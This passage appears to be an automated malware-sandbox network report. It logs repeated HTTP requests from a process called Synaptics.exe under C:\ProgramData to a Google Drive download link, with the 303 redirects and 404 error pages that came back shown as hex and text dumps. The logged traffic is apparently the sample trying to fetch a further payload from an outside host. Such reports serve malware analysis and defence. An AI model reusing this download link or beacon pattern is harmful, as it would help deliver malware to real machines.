                                                                                                                                                        2024-12-30 10:48:20 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        44192.168.2.749980142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:19 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IGiAX4FOjqx5XaL75oJ-cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        45192.168.2.749982142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:19 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:20 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6AndLhlbsNbkvm_Y0XT6VlLuxIXh3W7btSxNr7FWjt4TxbVQx542CdMItuCww7_TRyuraWJl0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PIinZ9V_Ffr9OtBcF8AJoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:20 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:20 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 35 51 4f 61 67 50 63 77 64 64 72 4c 67 4c 45 77 43 2d 79 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="K5QOagPcwddrLgLEwC-yPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:20 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        46192.168.2.749988142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:20 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-e9TElWg4k5s-xpq1rdPcDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        47192.168.2.749989142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:20 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-N56U_1NvD5vH2rS5H-GT4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        48192.168.2.749990142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:20 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:21 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5-yy1lnQegMSWXV5_qtixuAsg15L25M5idbxE8pWe1ulbfhPZ--cRApXuhHMPjON42nNiGJxQ
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1uzGSilDyRMcTPHMa0H6Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:21 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:21 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 57 70 59 70 35 7a 39 30 36 35 46 4f 4e 5f 5f 4c 62 2d 65 49 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="NWpYp5z9065FON__Lb-eIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:21 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        49192.168.2.749995142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:20 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6WzJCHHFCitdly-6sDww3fQihnAeOrZ4Q1qMY9CHB5sVq1wWUQNKZiu8w8FpwpbasK
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:21 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YFbwMx68ooDA5V73JvI3Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 4e 4e 4d 63 35 56 37 6d 58 2d 5f 50 6d 6d 65 32 55 2d 33 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="iNNMc5V7mX-_Pmme2U-3tA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        50192.168.2.750003142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:21 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4SMBIUrWcQow35bBBwpH4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
